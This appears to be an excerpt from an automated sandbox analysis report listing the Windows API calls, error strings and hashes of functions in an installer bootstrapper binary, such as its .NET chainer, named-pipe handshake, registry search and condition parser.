                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$FreeHeap$AllocateCompareProcess
                                                            • String ID: ($@$`<u$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                            • API String ID: 1555028553-639730868
                                                            • Opcode ID: cfa57f162bb3ae8a3796231a5cf38fb48986999a2f70690019dd69cb41a1a4a4
                                                            • Instruction ID: d1a3015b997627d0f00114b7bdc68de31f2d369740a47b329ff0fbc2b4fcc23b
                                                            • Opcode Fuzzy Hash: cfa57f162bb3ae8a3796231a5cf38fb48986999a2f70690019dd69cb41a1a4a4
                                                            • Instruction Fuzzy Hash: 5EB14C3194872ABBDB219BA4CC81EAEB764FB44730F200355F521EA3D1DB70EA50DB95
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,008D3E78,000000FF,?,?,?), ref: 008B71D4
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008B71F9
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008B7219
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 008B7235
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 008B725D
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 008B7279
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 008B72B2
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 008B72EB
                                                              • Part of subcall function 008B6D50: SysFreeString.OLEAUT32(00000000), ref: 008B6E89
                                                              • Part of subcall function 008B6D50: SysFreeString.OLEAUT32(00000000), ref: 008B6EC8
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B736F
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B741F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Compare$Free
                                                            • String ID: ($`<u$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                            • API String ID: 318886736-2569518843
                                                            • Opcode ID: b40a6aadc989f23fc5f479113c25ed15166e33cb569948bb28cd43ade51ca6fe
                                                            • Instruction ID: 01e772b25c03f19d908b044491789cd68eef9d1e159c56ed38d1554dae05ccd5
                                                            • Opcode Fuzzy Hash: b40a6aadc989f23fc5f479113c25ed15166e33cb569948bb28cd43ade51ca6fe
                                                            • Instruction Fuzzy Hash: D7A17F3194831ABBDB219A54CC41EEE7BA4FB04730F204365F921E67D1D774EA50DB91
                                                            APIs
                                                            • UuidCreate.RPCRT4(?), ref: 0089D4B3
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 0089D4DC
                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 0089D5C5
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0089D5CF
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0089D668
                                                            • WaitForSingleObject.KERNEL32(008BB500,000000FF,?,?,?,?), ref: 0089D673
                                                            • ReleaseMutex.KERNEL32(008BB500,?,?,?,?), ref: 0089D69D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0089D6BE
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0089D6CC
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0089D704
                                                              • Part of subcall function 0089D33E: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0089D642,?), ref: 0089D357
                                                              • Part of subcall function 0089D33E: ReleaseMutex.KERNEL32(?,?,?,?,0089D642,?), ref: 0089D375
                                                              • Part of subcall function 0089D33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089D3B6
                                                              • Part of subcall function 0089D33E: ReleaseMutex.KERNEL32(?), ref: 0089D3CD
                                                              • Part of subcall function 0089D33E: SetEvent.KERNEL32(?), ref: 0089D3D6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0089D7B9
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0089D7D1
                                                            Strings
                                                            • Failed to CreateProcess on path: %ls, xrefs: 0089D5FE
                                                            • Failed to wait for netfx chainer process to complete, xrefs: 0089D732
                                                            • Failed to allocate event name., xrefs: 0089D53F
                                                            • NetFxChainer.cpp, xrefs: 0089D4F1, 0089D5F3, 0089D6F0, 0089D728
                                                            • D, xrefs: 0089D5AA
                                                            • NetFxEvent.%ls, xrefs: 0089D52B
                                                            • %ls /pipe %ls, xrefs: 0089D57F
                                                            • Failed to allocate netfx chainer arguments., xrefs: 0089D593
                                                            • Failed to get netfx return code., xrefs: 0089D6FA
                                                            • Failed to convert netfx chainer guid into string., xrefs: 0089D4FB
                                                            • Failed to allocate section name., xrefs: 0089D51D
                                                            • Failed to process netfx chainer message., xrefs: 0089D648
                                                            • Failed to create netfx chainer., xrefs: 0089D55E
                                                            • Failed to create netfx chainer guid., xrefs: 0089D4C0
                                                            • NetFxSection.%ls, xrefs: 0089D509
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                            • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                            • API String ID: 1533322865-1825855094
                                                            • Opcode ID: dd606b8a82afb8beff0401346d569f838cdd2440a4885291326dde24ddf0b8f6
                                                            • Instruction ID: f12d15e5c4ba1228b661cf2e014c16c16d717beafea89dda4e8ef0dc986c3286
                                                            • Opcode Fuzzy Hash: dd606b8a82afb8beff0401346d569f838cdd2440a4885291326dde24ddf0b8f6
                                                            • Instruction Fuzzy Hash: 51A1AD72D40329AFDF21ABA8CC45BAEB7B8FB04310F154265E918FB251D7749D408F9A
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,008BB500,?,00000000,?,0087452F,?,008BB500), ref: 008854FD
                                                            • GetCurrentProcessId.KERNEL32(?,0087452F,?,008BB500), ref: 00885508
                                                            • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0087452F,?,008BB500), ref: 0088553F
                                                            • ConnectNamedPipe.KERNEL32(?,00000000,?,0087452F,?,008BB500), ref: 00885554
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088555E
                                                            • Sleep.KERNEL32(00000064,?,0087452F,?,008BB500), ref: 00885593
                                                            • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0087452F,?,008BB500), ref: 008855B6
                                                            • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 008855D1
                                                            • WriteFile.KERNEL32(?,0087452F,008BB500,00000000,00000000,?,0087452F,?,008BB500), ref: 008855EC
                                                            • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 00885607
                                                            • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 00885622
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088567D
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 008856B1
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 008856E5
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 00885719
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088574A
                                                            • GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088577B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                            • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                            • API String ID: 2944378912-2047837012
                                                            • Opcode ID: 92bc51de97ebea8c194dd8373e78b10f5a338efaf5466bc74b02a861a1baa429
                                                            • Instruction ID: 65da4083989fe1c3d538e461cefcc6ce400e3c466d4d42bda15f97dfdf8aaef7
                                                            • Opcode Fuzzy Hash: 92bc51de97ebea8c194dd8373e78b10f5a338efaf5466bc74b02a861a1baa429
                                                            • Instruction Fuzzy Hash: FE71D676D81636ABDB20F6A98C45FAEB6A8FF14B50F114125BD11FB280E7B4CD4087E1
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A45A
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A480
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0087A768
                                                            Strings
                                                            • Failed to allocate memory registry value., xrefs: 0087A587
                                                            • search.cpp, xrefs: 0087A54A, 0087A57D, 0087A5D0, 0087A6D3
                                                            • Failed to get expand environment string., xrefs: 0087A6DD
                                                            • Failed to format value string., xrefs: 0087A48B
                                                            • Failed to open registry key., xrefs: 0087A4ED
                                                            • Failed to allocate string buffer., xrefs: 0087A667
                                                            • Failed to set variable., xrefs: 0087A72B
                                                            • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0087A740
                                                            • Registry key not found. Key = '%ls', xrefs: 0087A4B4
                                                            • Failed to read registry value., xrefs: 0087A6F6
                                                            • Failed to format key string., xrefs: 0087A465
                                                            • Failed to change value type., xrefs: 0087A70F
                                                            • Failed to query registry key value size., xrefs: 0087A554
                                                            • Failed to clear variable., xrefs: 0087A4D8
                                                            • Failed to query registry key value., xrefs: 0087A5DA
                                                            • Unsupported registry key value type. Type = '%u', xrefs: 0087A608
                                                            • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0087A51C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16$Close
                                                            • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                            • API String ID: 2348241696-3124384294
                                                            • Opcode ID: b9232df088da54abecbfabd01ad3ccefd24e62b3f7cc5e6e46b82e38214a187b
                                                            • Instruction ID: 6d59a6e744ec3f2d87e46f1308500616b8ef74abad4842403ddee05150dd5090
                                                            • Opcode Fuzzy Hash: b9232df088da54abecbfabd01ad3ccefd24e62b3f7cc5e6e46b82e38214a187b
                                                            • Instruction Fuzzy Hash: 3DA1D272D4022ABBCF2A9AE8CC45AEEBA78FF44710F15C121F918F6254D775D9009B93
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00875795
                                                            • lstrlenW.KERNEL32(000002C0,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 0087579F
                                                            • _wcschr.LIBVCRUNTIME ref: 008759A7
                                                            • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0087A8B4,00000100,000002C0,000002C0,00000100), ref: 00875C4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                            • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                            • API String ID: 1026845265-2050445661
                                                            • Opcode ID: bbb42e9f97c15bf242c1de3c7c5cf93d04d3813f9ca3181e5d04611c5c350dfe
                                                            • Instruction ID: 22a8a3838503bed361f567949992a1beeaa6dd9d2781e5646b6e99dabc8afc5b
                                                            • Opcode Fuzzy Hash: bbb42e9f97c15bf242c1de3c7c5cf93d04d3813f9ca3181e5d04611c5c350dfe
                                                            • Instruction Fuzzy Hash: 4BF19671D00729EBDB11DF688841AAF7BA4FB44B60F14C129F918EB344D7B4DE419BA2
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0089D558,?,?,?), ref: 0089CEC7
                                                            • GetLastError.KERNEL32(?,?,0089D558,?,?,?), ref: 0089CED4
                                                            • ReleaseMutex.KERNEL32(?), ref: 0089D13C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                            • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                            • API String ID: 3944734951-2991465304
                                                            • Opcode ID: 549cfac51ecd36026cd1fd1f81e808a9ca683d72daffc7c7c71553832b646152
                                                            • Instruction ID: 0760b020975be26f11e6fca03f44e908d5f34117396c2fce69856a048e4757fd
                                                            • Opcode Fuzzy Hash: 549cfac51ecd36026cd1fd1f81e808a9ca683d72daffc7c7c71553832b646152
                                                            • Instruction Fuzzy Hash: 0D810476A41726BBCB21AB698C09F5ABBA4FF04720F054225FD18EB341D775DD008AE9
                                                            APIs
                                                              • Part of subcall function 008B32F3: VariantInit.OLEAUT32(?), ref: 008B3309
                                                              • Part of subcall function 008B32F3: SysAllocString.OLEAUT32(?), ref: 008B3325
                                                              • Part of subcall function 008B32F3: VariantClear.OLEAUT32(?), ref: 008B33AC
                                                              • Part of subcall function 008B32F3: SysFreeString.OLEAUT32(00000000), ref: 008B33B7
                                                            • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,008BCA9C,?,?,Action,?,?,?,00000000,00875445), ref: 0087EB13
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0087EB5D
                                                            Strings
                                                            • Addon, xrefs: 0087EB9A
                                                            • version.dll, xrefs: 0087EB70
                                                            • cabinet.dll, xrefs: 0087EBBA
                                                            • comres.dll, xrefs: 0087EB26
                                                            • Failed to resize Upgrade code array in registration, xrefs: 0087EC35
                                                            • Failed to resize Addon code array in registration, xrefs: 0087EC3C
                                                            • Failed to resize Detect code array in registration, xrefs: 0087EC2E
                                                            • Failed to get RelatedBundle element count., xrefs: 0087EA97
                                                            • Patch, xrefs: 0087EBDD
                                                            • Detect, xrefs: 0087EB04
                                                            • Invalid value for @Action: %ls, xrefs: 0087EC52
                                                            • Failed to get @Id., xrefs: 0087EC62
                                                            • Failed to get @Action., xrefs: 0087EC69
                                                            • Action, xrefs: 0087EAD0
                                                            • RelatedBundle, xrefs: 0087EA50
                                                            • Failed to get RelatedBundle nodes, xrefs: 0087EA72
                                                            • Failed to get next RelatedBundle element., xrefs: 0087EC70
                                                            • Upgrade, xrefs: 0087EB50
                                                            • Failed to resize Patch code array in registration, xrefs: 0087EC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$CompareVariant$AllocClearFreeInit
                                                            • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                            • API String ID: 702752599-259800149
                                                            • Opcode ID: 1ac31b0ec8055777112eb2aec3f7bbf998e758f8b730e950929466c57ed182fa
                                                            • Instruction ID: 07634776d92e197db1bd206aceff68c3027331f902950647073552d4380b06ee
                                                            • Opcode Fuzzy Hash: 1ac31b0ec8055777112eb2aec3f7bbf998e758f8b730e950929466c57ed182fa
                                                            • Instruction Fuzzy Hash: 1C71C27590461ABBCB11CA54C985EAEBBB4FF09724F208298F929E73C5D734ED11CB90
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 008846F3
                                                            • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 00884714
                                                            • GetLastError.KERNEL32(?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 0088471A
                                                            • ReadFile.KERNEL32(feclient.dll,00000000,008BB518,?,00000000,00000000,008BB519,?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 008847A8
                                                            • GetLastError.KERNEL32(?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 008847AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastRead$CurrentProcess
                                                            • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                            • API String ID: 1233551569-452622383
                                                            • Opcode ID: a5fdad2fb7e6fb9edb5e32bf2c0e1bff6e08ad5bc57035fc8347e6970acc0104
                                                            • Instruction ID: ad5e1ae2b4367456cd3e1a0457657252e4349baa3c3ed996871065bc0e330d1f
                                                            • Opcode Fuzzy Hash: a5fdad2fb7e6fb9edb5e32bf2c0e1bff6e08ad5bc57035fc8347e6970acc0104
                                                            • Instruction Fuzzy Hash: 3351A137D4022AB7DB21AA954C46F6E7A78FB01B20F115239BE15FB280E774DD4097E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: StringVariant$AllocClearFreeInit
• String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
• API String ID: 760788290-1911311241
APIs
• GetStringTypeW.KERNEL32(00000001,56008BDB,00000001,?,00879946,?,00000000,00000000,?,?,0087992E,?,?,00000000,?), ref: 00878FB2
Strings
• Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00879162
• AND, xrefs: 008792BC
• NOT, xrefs: 008792DB
• Failed to set symbol value., xrefs: 00879060
• Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 008791DE
• -, xrefs: 00879118
• Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00879408
• Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00879380
• condition.cpp, xrefs: 00879084, 0087914E, 008791CA, 0087922E, 0087936C, 008793B0, 008793F4
• Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00879098
• Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 008793C4
• Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00879242
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: StringType
• String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
• API String ID: 4177115715-3594736606
APIs
  • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
  • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
• CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00891CB8
• CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00891CD6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: CompareHeapString$AllocateProcess
• String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
• API String ID: 2664528157-1714101571
APIs
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 008B7857
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 008B787C
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 008B789C
• CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008B78CF
